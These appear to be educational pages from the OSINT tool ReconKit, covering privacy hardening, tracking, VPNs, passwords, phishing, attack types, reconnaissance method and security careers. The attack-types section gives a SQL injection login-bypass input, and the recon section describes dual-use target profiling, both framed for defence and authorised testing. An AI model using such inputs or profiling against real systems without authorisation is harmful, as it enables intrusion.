// DEFENSIVE SECURITY
How to Protect Yourself Online
The data on your ReconKit Exposure page is what every website you visit silently collects — with zero warning and no permission required. Here's how to significantly reduce what you expose, starting with the most impactful steps.
The Most Important Steps First
Install uBlock Origin in your browser. It blocks ads, trackers, and fingerprinting scripts. It is the single most impactful thing you can do immediately — free, open source, and takes 30 seconds to set up.
Switch to Firefox or Brave Browser. Both actively resist fingerprinting and tracking. Chrome is the worst offender — it is Google's primary data collection tool disguised as a browser.
Use a password manager — Bitwarden (free), 1Password, or KeePass. Generate a unique random password for every account. This one change eliminates credential stuffing attacks entirely.
Enable two-factor authentication (2FA) everywhere. Use an authenticator app (Google Authenticator, Authy, or Bitwarden) rather than SMS where possible. Even weak 2FA is infinitely better than none.
Use a reputable VPN on public networks — coffee shops, airports, hotels. Mullvad, ProtonVPN, or IVPN. Avoid any free VPN — they sell your data.
Browser Hardening
Warning: Canvas and WebGL fingerprinting cannot be blocked by a VPN. Even behind a VPN, your browser generates a unique identifier from your GPU and fonts. Use Brave or Firefox with Privacy Badger to mitigate this.
Beyond installing a good browser, configure it properly:
Firefox hardening: Set privacy.resistFingerprinting = true in about:config. Install uBlock Origin and Privacy Badger. Change your DNS to 1.1.1.1 or 9.9.9.9 in Settings → Network.
Brave is hardened by default — it blocks fingerprinting, trackers, and ads without any configuration. It also has a built-in VPN and Tor integration.
Network & DNS
Your ISP logs every domain you visit by default. Changing your DNS to a privacy-respecting provider prevents this without any other changes to your setup.
| Provider | DNS Address | Logs? | Notes |
|---|
| Cloudflare | 1.1.1.1 | No | Fast, privacy-focused |
| Quad9 | 9.9.9.9 | No | Blocks malicious domains |
| NextDNS | Custom | Optional | Configurable blocklists |
| Your ISP | Default | Yes | Sold to advertisers |
Account Security Checklist
✓ Unique password for every account — check your most important accounts first: email, banking, social media.
✓ 2FA on email — your email is the master key to every other account via password reset.
✓ Check for breaches — use the
Breach Check tool or visit haveibeenpwned.com.
✓ Keep software updated — most real-world attacks exploit known, already-patched vulnerabilities.
// SURVEILLANCE MECHANICS
How Websites Track You
Most people know about cookies. But modern tracking is layered — websites use multiple techniques simultaneously, many of which are invisible and survive cookie deletion, VPN use, and private browsing. ReconKit demonstrates these in real time.
Layer 1 — IP Address
Your IP address is sent with every request you make. No permission, no opt-out. It reveals your approximate city, ISP, and sometimes your building or employer. Law enforcement can subpoena ISPs to tie an IP to an identity with a timestamp.
VPNs mask your real IP — but shift trust to the VPN provider. If they keep logs, your privacy is only as good as their policies.
Layer 2 — Browser Fingerprinting
Your browser leaks dozens of data points with every page visit — screen resolution, installed fonts, GPU model, timezone, language settings, and more. Combined, these create a unique "fingerprint" that identifies you even after clearing cookies.
| Signal | What it reveals | Blockable? |
|---|
| Canvas fingerprint | GPU rendering — uniquely identifies your device | Partial |
| WebGL fingerprint | GPU vendor and model | Partial |
| Audio fingerprint | Sound hardware characteristics | Partial |
| Installed fonts | OS, region, installed software | Yes (Brave) |
| Screen resolution | Device type and monitor setup | No |
| Timezone | Approximate location | No |
| User agent | OS, browser, and version | Spoofable |
| Battery level | Weak cross-site identifier | Deprecated |
Layer 3 — Third-Party Cookies & Trackers
When a website embeds a Google Analytics script, a Facebook Like button, or a Twitter widget, those third parties set cookies that follow you across every site where those scripts appear — which is most of the commercial web. This is how Facebook knows what you searched for on a competitor's site.
Layer 4 — WebRTC Leaks
WebRTC is a real-time communication protocol built into browsers for video calls. Even when you're behind a VPN, browsers can reveal your real local and public IP address through WebRTC to any page that asks. ReconKit's Exposure tab checks for this specifically.
This is why VPN alone is insufficient. A site can fingerprint your GPU, read your WebRTC IPs, and identify you across sessions — even if your VPN IP changes. You need fingerprint resistance, not just IP masking.
Layer 5 — Behavioural Biometrics
Advanced tracking captures how you move your mouse, how fast you type, scrolling patterns, and touch pressure on mobile. These patterns are highly unique and cannot be blocked by any browser extension. This is used by fraud detection systems and increasingly by ad networks.
// NETWORK PRIVACY
VPNs Explained
A VPN (Virtual Private Network) encrypts your internet traffic and routes it through a server in another location — masking your real IP from the websites you visit and encrypting traffic from your ISP. Understanding what VPNs actually protect (and don't) is critical.
What a VPN Does
✓ Hides your IP address from websites and services you visit.
✓ Encrypts your traffic from your ISP — they see you connected to a VPN, not what you browse.
✓ Protects you on public WiFi — prevents MITM attacks on open networks.
✓ Bypasses geographic restrictions — access region-locked content.
What a VPN Does NOT Do
✗ Does not stop browser fingerprinting — canvas, WebGL, and font fingerprints are unaffected.
✗ Does not stop cookies already set on your device.
✗ Does not hide you from Google/Facebook when you're logged in — they track by account.
✗ Does not stop WebRTC leaks unless your browser is configured to prevent them.
✗ Does not make you anonymous — it shifts trust from your ISP to your VPN provider.
Choosing a VPN
The VPN market is full of providers with questionable privacy practices. Many free VPNs are funded by selling user data — the opposite of their stated purpose. The criteria that matter:
| Provider | Logs? | Jurisdiction | Price | Audited? |
|---|
| Mullvad | No | Sweden | €5/mo | Yes |
| ProtonVPN | No | Switzerland | Free–€8/mo | Yes |
| IVPN | No | Gibraltar | $6/mo | Yes |
| ExpressVPN | Claims no | British Virgin Islands | $8/mo | Partial |
| NordVPN | Claims no | Panama | $4/mo | Partial |
| Free VPNs | Yes | Various | Free | No |
Mullvad accepts cash and cryptocurrency and doesn't require an email address to sign up. If anonymity matters to you, this is the most serious option available.
VPN vs Tor
Tor routes your traffic through multiple encrypted relays, making it much harder to trace. It's slower than a VPN and not suitable for streaming, but provides stronger anonymity for sensitive browsing. For most people, a trusted VPN is the right tool — Tor is for high-stakes situations where anonymity is critical.
// AUTHENTICATION SECURITY
Password Security
Passwords remain the primary authentication mechanism for most systems. Understanding how they're attacked helps you build habits that are actually effective — not just security theatre.
How Passwords Are Attacked
| Attack | How it works | Defence |
|---|
| Credential stuffing | Leaked password lists from old breaches tried on other services | Unique passwords everywhere |
| Brute force | Every possible combination tried sequentially | Length — 16+ characters |
| Dictionary attack | Common words and patterns tried first | Random characters or passphrase |
| Phishing | Fake login page captures your credentials | 2FA + check the URL |
| Keylogger | Malware captures keystrokes | Keep OS updated, use AV |
Length Beats Complexity
A 20-character passphrase of random words is dramatically stronger than Tr0ub@dor!. Length exponentially increases brute-force time. A 16-character random password takes centuries to crack. An 8-character complex password can fall in hours with modern GPUs.
The Password Manager Case
You cannot memorise unique 20-character random passwords for 200 accounts. You don't need to. A password manager generates and stores them. You need one strong master password — make it a long passphrase you'll remember.
Bitwarden — free, open source, audited, works everywhere. Best choice for most people.
1Password — polished, team/family features, $3/mo.
KeePass — local only, no cloud, maximum control for technical users.
Two-Factor Authentication
2FA means a stolen password alone cannot access your account. The second factor (an authenticator app code) expires every 30 seconds. Even if attackers have your password from a breach, they cannot log in without physical access to your phone.
SMS-based 2FA is weak — SIM swapping attacks can intercept text messages. Use an authenticator app (Authy, Google Authenticator, or the Bitwarden built-in authenticator) for important accounts.
⚙ Try the Password Generator in ReconKit Utilities →
// SOCIAL ENGINEERING
Recognising Phishing Attacks
Phishing is the most common attack vector globally — not because it's sophisticated, but because it works. It exploits human psychology rather than technical vulnerabilities. No firewall protects against a person willingly entering their credentials on a fake page.
Types of Phishing
| Type | Target | Method |
|---|
| Email phishing | Mass — anyone | Fake "your account has been compromised" emails with malicious links |
| Spear phishing | Specific individual | Personalised attack using researched information about you |
| Whaling | Executives / high value | CEO fraud — impersonating leadership to authorise wire transfers |
| Smishing | Mobile users | Fake SMS from "your bank" or delivery service |
| Vishing | Phone users | Caller impersonates tech support, bank, or government |
| Clone phishing | Email recipients | Exact copy of legitimate email with malicious links substituted |
Red Flags to Look For
Check the actual domain carefully — paypa1.com, paypai.com, paypal.com.evil.net are not PayPal. The legitimate domain is always the part immediately before .com, .org, etc. Hover over any link before clicking to see the real destination.
Urgency is the primary weapon. "Your account will be suspended in 24 hours" — "Verify now or lose access" — "Immediate action required." Urgency bypasses critical thinking. Real companies don't threaten immediate consequences for routine security checks. If it feels urgent, slow down.
Other red flags: requests for credentials via email, attachments you didn't expect, mismatched sender addresses (display name vs actual address), generic greetings ("Dear Customer" instead of your name), and requests to pay by gift card or wire transfer.
If You Clicked a Phishing Link
Do not enter any information. Close the tab immediately.
If you entered credentials: change your password on the real site immediately, then enable 2FA if you haven't.
If you downloaded a file: do not open it. Run a malware scan. Consider a system restore if you did open it.
Check your email for forwarding rules — phishers often set rules to silently forward your email to themselves.
Report the phishing email to your email provider and to the impersonated organisation.
// THREAT LANDSCAPE
Common Attack Types
Understanding attack vectors is the foundation of defence. You cannot protect against threats you don't understand. These are the most common techniques used against individuals and organisations.
Network Attacks
Man-in-the-Middle (MITM). The attacker positions themselves between you and the server, intercepting and potentially modifying traffic. Most dangerous on public WiFi. HTTPS and VPNs mitigate this — always verify the padlock and certificate when handling sensitive data.
DNS Spoofing / Poisoning. Corrupted DNS responses redirect users to attacker-controlled servers even when they type the correct domain. Use DNSSEC-supporting resolvers and verify HTTPS certificates.
Web Application Attacks
SQL Injection. Attacker inserts malicious SQL into a web form input, manipulating the database. Example: entering ' OR 1=1-- in a login form to bypass authentication. Prevented by parameterised queries and input sanitisation.
Cross-Site Scripting (XSS). Malicious JavaScript injected into a legitimate page runs in victims' browsers — stealing session cookies, redirecting users, or capturing keystrokes. Prevented by Content Security Policy headers and output encoding.
Cross-Site Request Forgery (CSRF). A malicious page secretly sends requests to a site where the victim is authenticated. The site cannot distinguish the legitimate user from the attack. Prevented by CSRF tokens and SameSite cookie attributes.
Endpoint Attacks
Ransomware. Malware encrypts all your files and demands payment for the decryption key. Spreads through phishing emails, malicious downloads, and unpatched vulnerabilities. Defence: regular offline backups, software updates, and email vigilance.
Credential Stuffing. Using lists of leaked username/password pairs from breaches to try other services. Works because most people reuse passwords. Defence: unique passwords + 2FA everywhere.
Social Engineering
Manipulating people rather than systems — pretexting, impersonation, urgency tactics. No technical control fully defends against a sufficiently convincing human attacker. Defences are organisational: verification procedures, scepticism about unsolicited contact, and training.
// OPEN SOURCE INTELLIGENCE
Introduction to OSINT
OSINT — Open Source Intelligence — is the practice of collecting and analysing information from publicly available sources to produce actionable intelligence. Everything ReconKit does is OSINT. It is legal, ethical (when used appropriately), and a foundational skill in cybersecurity.
What Counts as "Open Source"?
Open source does not mean just code repositories. In an intelligence context, it means anything publicly available without requiring unauthorised access:
Public sources include: websites and web archives, social media profiles, DNS records, WHOIS registration data, SSL certificate logs (crt.sh), job postings, court records, company filings, academic publications, code repositories, news articles, and any data indexed by search engines.
OSINT in Cybersecurity
| Use Case | Who Uses It | Purpose |
|---|
| Reconnaissance | Penetration testers | Map attack surface before an authorised test |
| Threat intelligence | SOC analysts | Identify indicators of compromise and attacker infrastructure |
| Incident response | IR teams | Trace attacker origins and identify compromised assets |
| Digital forensics | Investigators | Build evidence chains from public data |
| Red teaming | Red teams | Simulate realistic attacker behaviour against an organisation |
| Brand monitoring | Security teams | Detect phishing domains and data leaks referencing the organisation |
The OSINT Framework
OSINT Framework (osintframework.com) is a community-maintained visual map of OSINT sources and tools, organised by data type. It's an essential reference for understanding what kinds of data are publicly available and how to find them systematically.
Legal and Ethical Boundaries
OSINT does not mean anything goes. Even with public data: aggregating personal information about private individuals for harassment is illegal in most jurisdictions. Accessing data behind a login — even if you have credentials — crosses into computer misuse law. The Computer Misuse Act (UK), CFAA (US), and Kenya's Computer Misuse and Cybercrimes Act all apply.
The ethical test is intent and consent. Researching your own exposure, conducting authorised penetration tests, or working in legitimate threat intelligence are all lawful. Researching individuals without their knowledge for personal or commercial advantage is a grey area that often crosses legal lines.
// INTELLIGENCE METHODOLOGY
Reconnaissance Methodology
Effective reconnaissance follows a structured methodology — not just "Google things and see what appears." A systematic approach ensures you build a comprehensive picture of an organisation's attack surface without missing critical elements.
The Reconnaissance Kill Chain
Define scope. What is the target? What's in scope (domains, IPs, subsidiaries) vs out of scope? Document this before starting. Never operate beyond agreed scope in an authorised engagement.
Passive reconnaissance. Gather information without touching the target's infrastructure. DNS records, WHOIS, certificate logs, Shodan, Google Dorks, social media, job postings. Target is unaware.
Infrastructure mapping. Identify IP ranges, ASNs, hosting providers, CDN usage, and cloud infrastructure. Tools: Hurricane Electric BGP toolkit, Shodan, Censys.
Subdomain enumeration. Discover subdomains using certificate transparency (crt.sh), DNS brute forcing, and passive DNS databases. Subdomains often reveal development environments, admin panels, and legacy systems.
Technology fingerprinting. Identify web frameworks, CMS platforms, server software, JavaScript libraries, and analytics tools. Tools: Wappalyzer, WhatWeb, BuiltWith.
People & credentials. Identify key personnel via LinkedIn, breach databases (HaveIBeenPwned, DeHashed), GitHub commits, email pattern discovery. Social engineering starts here.
Document and analyse. Consolidate findings into a structured report. Identify the most promising attack paths. Never act on findings without proper authorisation.
Key OSINT Data Sources for Recon
| Source | URL | What it reveals |
|---|
| crt.sh | crt.sh | All SSL certs issued — reveals subdomains |
| Shodan | shodan.io | Internet-connected devices, open ports, banners |
| Censys | search.censys.io | Similar to Shodan, different scan coverage |
| VirusTotal | virustotal.com | Domain/IP reputation, passive DNS |
| SecurityTrails | securitytrails.com | Historical DNS, subdomain discovery |
| OSINT Framework | osintframework.com | Comprehensive source map |
| Google Dorks | google.com | Exposed files, admin panels via search operators |
| Wayback Machine | web.archive.org | Historical site versions, old endpoints |
🔍 Try the Domain, DNS & SSL tools in ReconKit →
// RECON TECHNIQUES
Passive vs Active Reconnaissance
The distinction between passive and active reconnaissance is not just technical — it has legal and ethical implications. Understanding when you're crossing from passive observation into active probing is fundamental to operating lawfully.
Passive Reconnaissance
Passive recon gathers information without directly interacting with the target's systems. The target cannot detect your activity because you never touch their infrastructure.
Examples of passive recon:
— Searching Google for target information
— Reading WHOIS registration records
— Querying crt.sh for SSL certificates
— Searching Shodan (data already indexed)
— Reading the target's public website
— Searching LinkedIn for employees
— Checking HaveIBeenPwned for breached emails
— Reviewing GitHub for accidentally committed secrets
Passive recon is almost universally legal. You're consuming publicly available data through normal channels.
Active Reconnaissance
Active recon involves directly probing the target's systems. You generate traffic that hits their servers and can potentially be detected and logged.
Examples of active recon:
— Port scanning (Nmap) against their IP ranges
— DNS zone transfer attempts
— Web crawling their application
— Sending requests to discover hidden paths
— Banner grabbing from their services
— Fuzzing web forms or APIs
— Attempting authentication against login pages
Active recon without explicit written authorisation is illegal in most jurisdictions — including Kenya (Computer Misuse and Cybercrimes Act 2018), UK (Computer Misuse Act), and US (CFAA). Even if your intent is benign, unauthorised port scanning constitutes an offence in most countries. Always have written scope and authorisation.
The Grey Zone
Some techniques sit between passive and active. Visiting a public website generates server logs — is that active? Using Shodan's already-indexed data is passive, but Shodan scanning your target on demand is active. Generally: if you generate new traffic to their systems, it's active regardless of what tool you use.
ReconKit and This Distinction
ReconKit deliberately uses only passive techniques and public third-party APIs. The Domain, DNS, SSL, and WHOIS tools query existing databases — not the target directly. This means ReconKit is safe to use for research without risk of generating unauthorised traffic to target systems.
// IDENTITY EXPOSURE
Digital Footprinting
Your digital footprint is the total body of data that exists about you online — some you created deliberately, much you left without realising. Understanding your own footprint is the first step in both protecting your privacy and understanding how attackers profile targets.
Active vs Passive Footprint
| Type | Examples | Control? |
|---|
| Active | Social media posts, forum comments, blog articles, GitHub commits, LinkedIn profile | Partial — you created it, you can delete it (mostly) |
| Passive | Server logs, tracking pixels, advertising profiles, data broker records, WHOIS registration, surveillance camera footage | Minimal — collected without your action |
What a Skilled OSINT Analyst Can Find About You
Given just your email address or username, an experienced analyst can typically: identify your real name, find all social media profiles, approximate your location from geo-tagged posts, identify your employer and job title, find your phone number from data broker sites, identify your approximate income from public records, and potentially find your home address. This is not hypothetical — it's routine in investigations.
Reducing Your Footprint
Google yourself — and your email addresses, phone numbers, and usernames. Use site-specific operators: site:linkedin.com "your name"
Opt out of data brokers — Spokeo, WhitePages, BeenVerified, Intelius all have opt-out forms. It's tedious but effective. Services like DeleteMe automate this.
Review your social media privacy settings. Default settings on most platforms are maximally public. Audit what's visible to non-connections.
Remove geolocation data from photos before posting. Modern smartphones embed GPS coordinates in EXIF metadata. Tools like ExifTool can strip this.
Use separate emails for different purposes — one for finance, one for social, one for shopping, one for throwaway registrations. Proton Mail for sensitive communication.
🔍 Check your username exposure across platforms →
// ETHICS & PRACTICE
Responsible Disclosure
If you find a security vulnerability in someone else's system — a website, application, or service — responsible disclosure is the ethical and increasingly legally expected way to handle it. This is distinct from both doing nothing and from exploiting the vulnerability.
The Core Principle
Give the affected organisation a reasonable opportunity to fix the vulnerability before making it public. This balances the public's right to know about security issues against the harm that would come from immediate public disclosure while the vulnerability is still exploitable.
The Responsible Disclosure Process
Document the vulnerability thoroughly. Note the affected URL or component, the steps to reproduce, the potential impact, and proof-of-concept evidence. Do not exploit further than necessary to demonstrate the issue.
Find the right contact. Look for a security.txt file at domain.com/security.txt, a bug bounty programme on HackerOne or Bugcrowd, or a security@ email address. Many organisations have published vulnerability disclosure policies.
Report clearly and professionally. Include all documentation. State that you're reporting in good faith and are not demanding payment. Give a reasonable timeline — 90 days is the industry standard established by Google Project Zero.
Wait for acknowledgement and patch. Track the deadline. Most organisations will respond and fix within 90 days if they take security seriously. Some will offer a reward (bug bounty) even without a formal programme.
Disclose publicly after the deadline. If the organisation has not patched after 90 days and is not communicating, coordinated disclosure to a CVE database or security researcher community is appropriate. Always err on the side of delay if there's genuine ongoing remediation effort.
Bug Bounty Programmes
Many organisations pay researchers for finding vulnerabilities through formal bug bounty programmes. Platforms like HackerOne and Bugcrowd host these programmes and provide clear rules of engagement, payment structures, and legal protection for researchers operating within scope.
Bug bounty as a career path: Top researchers earn six figures annually from bug bounties alone. The top HackerOne researchers have earned over $1 million. This is a legitimate and growing career path in cybersecurity that requires the same skills as penetration testing — ethical hacking skills you can develop on platforms like TryHackMe, HackTheBox, and CTF competitions.
What Not to Do
Never: Access, copy, or exfiltrate data beyond what's necessary to prove the vulnerability. Demand payment before reporting. Publicly disclose without giving the organisation a reasonable time to respond. Continue testing after you've found and documented the vulnerability. Use the vulnerability for any personal gain. These actions convert ethical disclosure into criminal activity.
// CAREER DEVELOPMENT
Cybersecurity Certification Roadmap
Certifications in cybersecurity serve two purposes: structured learning and market signalling to employers. The right path depends on which specialisation you're targeting. Here's an honest, opinionated guide to the certifications that actually move the needle.
The Foundation Layer — Start Here
| Cert | Provider | Cost | Value |
|---|
| CompTIA Security+ | CompTIA | ~$400 | Global baseline. Required or preferred on most entry-level job postings. Do this first. |
| Google Cybersecurity Cert | Coursera | ~$50/mo | Practical, builds portfolio projects, well-regarded for beginners. Good supplement. |
| CompTIA Network+ | CompTIA | ~$350 | Useful if you lack networking fundamentals. Skip if you already understand TCP/IP, routing, subnetting. |
Specialisation Tracks
After Security+, choose your lane. The three main paths in cybersecurity employment:
Track A — Security Analyst (Blue Team)
Monitoring, threat detection, incident response. Best combined with data science skills.
| Cert | Cost | Notes |
|---|
| CompTIA CySA+ | ~$400 | Security analyst focused, high employer recognition |
| Splunk Core Certified User | Free training + ~$130 exam | SIEM tool used by most SOCs globally — very practical |
| Microsoft SC-200 | ~$165 | Security Operations Analyst using Microsoft Sentinel |
| CISSP | ~$700 | Senior/management level. Requires 5 years experience. Long-term goal. |
Track B — Cloud Security
Fastest-growing segment. Security skills + cloud knowledge = premium salary.
| Cert | Cost | Notes |
|---|
| Microsoft AZ-900 | ~$165 | Azure fundamentals — baseline before security specialisation |
| Microsoft AZ-500 | ~$165 | Azure Security Engineer. Highly valued in UK/EU markets. |
| AWS Security Specialty | ~$300 | For AWS environments — strong in US market |
| SC-100 | ~$165 | Microsoft Cybersecurity Architect — senior level |
Track C — Penetration Testing (Red Team)
The most visible path. Hardest to enter without experience but highest earning ceiling.
| Cert | Cost | Notes |
|---|
| eJPT (eLearnSecurity) | ~$200 | Good entry point — practical exam, affordable, respected |
| CEH (EC-Council) | ~$1,200 | Known brand, especially in UK/Middle East. More theoretical than OSCP. |
| OSCP (Offensive Security) | ~$1,500 | The gold standard. 24-hour practical exam. Opens senior roles internationally. Work toward this. |
| CRTO (Red Team Ops) | ~$500 | Cobalt Strike, C2 infrastructure — advanced red team operations |
Free Practice Platforms
TryHackMe — beginner-friendly, guided learning paths, browser-based. Start here.
HackTheBox — more advanced, real CTF-style machines. Build your public profile.
PicoCTF — beginner CTF, university-run, year-round challenges.
CTFtime.org — calendar of all active CTF competitions globally. Participate and document wins.
// REFERENCE
Security Glossary
A working vocabulary of cybersecurity terms. Understanding these precisely matters — imprecise language leads to imprecise thinking about security.
ASN — Autonomous System Number
A unique identifier assigned to a network operator (ISP, cloud provider, university) that controls a range of IP addresses. Used in routing and threat intelligence to identify network ownership.
CSRF — Cross-Site Request Forgery
Attack that tricks a victim's browser into making unintended requests to a site where they're authenticated. Prevented by CSRF tokens and SameSite cookie policies.
CVE — Common Vulnerabilities and Exposures
A public dictionary of known security vulnerabilities, each assigned a unique ID (e.g., CVE-2021-44228). The standard way to reference specific vulnerabilities across tools and organisations.
DNS — Domain Name System
The internet's address book. Translates human-readable domain names (google.com) into IP addresses computers use to route traffic. DNS queries reveal your browsing history to your ISP by default.
DMARC / DKIM / SPF
Email authentication standards. SPF specifies which servers can send email for a domain. DKIM cryptographically signs emails. DMARC tells receiving servers what to do with emails that fail those checks. Missing these enables email spoofing.
Firewall
A security system that monitors and controls network traffic based on rules. Can be network-level (blocking traffic between networks) or host-level (on an individual machine). Not a silver bullet — most attacks enter via allowed traffic.
IDS / IPS — Intrusion Detection/Prevention System
IDS monitors network traffic for suspicious patterns and alerts. IPS goes further — it can automatically block detected threats. Often confused with firewalls; they serve different purposes.
IoC — Indicator of Compromise
Evidence that a system has been compromised — malicious IP addresses, file hashes, domain names, or registry keys associated with known malware. Used in threat intelligence to detect infections.
Malware
Malicious software — an umbrella term covering viruses, ransomware, trojans, spyware, adware, rootkits, and worms. Each has different infection vectors, persistence mechanisms, and objectives.
MITM — Man-in-the-Middle
Attack where the attacker intercepts communications between two parties. Both parties believe they're communicating directly with each other. HTTPS and certificate pinning mitigate this.
MFA / 2FA — Multi/Two-Factor Authentication
Requiring more than one proof of identity. Factors are something you know (password), something you have (phone), or something you are (biometric). Dramatically reduces account takeover risk.
OSINT — Open Source Intelligence
Intelligence gathered from publicly available sources without requiring privileged access. The foundation of reconnaissance in cybersecurity and the methodology behind ReconKit.
OSCP — Offensive Security Certified Professional
The most respected penetration testing certification. Features a 24-hour practical exam requiring candidates to compromise multiple machines in a controlled environment. No multiple choice — you either own the machines or you don't.
Penetration Testing
Authorised, simulated cyberattack against a system to find and report vulnerabilities before real attackers do. Distinguished from hacking by explicit written authorisation and defined scope.
Phishing
Social engineering attack using fraudulent communication (typically email) to steal credentials or deliver malware. The most common initial attack vector in corporate breaches.
Ransomware
Malware that encrypts victim data and demands payment for the decryption key. Has become a major criminal industry targeting hospitals, governments, and corporations. Offline backups are the primary defence.
SIEM — Security Information and Event Management
Platform that aggregates and analyses log data from across an organisation's systems to detect threats. Splunk, Microsoft Sentinel, and IBM QRadar are leading products. Central tool in SOC operations.
SOC — Security Operations Centre
A team (and facility) dedicated to continuously monitoring and defending an organisation's systems. Entry-level SOC analyst is the most common first job in cybersecurity.
SQL Injection
Attack inserting malicious SQL into input fields to manipulate a database. Can expose data, bypass authentication, or destroy records. Entirely preventable with parameterised queries.
TLS/SSL
Encryption protocols securing data in transit between browser and server. TLS is the modern successor to SSL (which is deprecated). The "S" in HTTPS. Certificate transparency logs (crt.sh) make all issued certificates public.
VPN — Virtual Private Network
Encrypts traffic and masks IP by routing through a server elsewhere. Shifts trust from ISP to VPN provider. Does not protect against fingerprinting, cookies, or account-based tracking.
XSS — Cross-Site Scripting
Injecting malicious JavaScript into a legitimate website that executes in victims' browsers. Can steal session cookies, redirect users, or log keystrokes. Prevented by Content Security Policy and output encoding.
Zero-day
A software vulnerability unknown to the vendor, with no available patch. "Zero days" for defenders to prepare. Actively exploited zero-days are extremely valuable and traded on dark markets for significant sums.
// TOOLKIT
Recommended Tools
A curated list of tools used by professionals. Organised by purpose, with honest notes on when each one actually matters.
OSINT & Reconnaissance
| Tool | Type | Purpose |
|---|
| ReconKit This tool | Web app | Browser-based OSINT toolkit — exposure, IP, domain, DNS, SSL, headers, breach |
| Shodan | Search engine | Find internet-connected devices, open ports, exposed services |
| Maltego | Desktop app | Visual link analysis and OSINT graph mapping |
| theHarvester | CLI | Email, subdomain, and employee enumeration from public sources |
| Sherlock | Python/CLI | Username search across 300+ social platforms |
| SpiderFoot | Web/CLI | Automated OSINT collection from 100+ sources |
| OSINT Framework | Reference | Directory of all public OSINT sources by data type |
Network & Infrastructure
| Tool | Purpose | Requires |
|---|
| Nmap | Port scanning and service detection | Authorisation |
| Wireshark | Packet capture and analysis | Your own network |
| Burp Suite | Web application testing proxy | Authorisation |
| Masscan | High-speed port scanner | Authorisation |
| dig / nslookup | DNS queries from command line | Freely usable |
| curl | HTTP requests and header inspection | Freely usable |
Learning Platforms
| Platform | Level | Cost | Best for |
|---|
| TryHackMe | Beginner–Intermediate | Free + £10/mo | Structured learning paths, browser-based labs |
| HackTheBox | Intermediate–Advanced | Free + €14/mo | Real-world machines, CTF competitions |
| PicoCTF | Beginner | Free | CTF competitions, university-grade challenges |
| PortSwigger Web Academy | All levels | Free | Web application security — best free resource available |
| SANS courses | Advanced | $5,000+ | Deep technical training with certs (GIAC) |
| Cybrary | All levels | Free + $69/mo | Video courses for most major certs |
Privacy Tools
| Tool | Purpose | Cost |
|---|
| uBlock Origin | Ad and tracker blocking — browser extension | Free |
| Bitwarden | Password manager — open source, cross-platform | Free |
| ProtonMail / Proton | Encrypted email and cloud storage | Free tier |
| Mullvad VPN | No-logs VPN, anonymous signup | €5/mo |
| Signal | End-to-end encrypted messaging | Free |
| Tor Browser | Anonymised browsing via onion routing | Free |
| ExifTool | Remove metadata (GPS, device info) from files | Free |
⚡ Back to ReconKit Toolkit →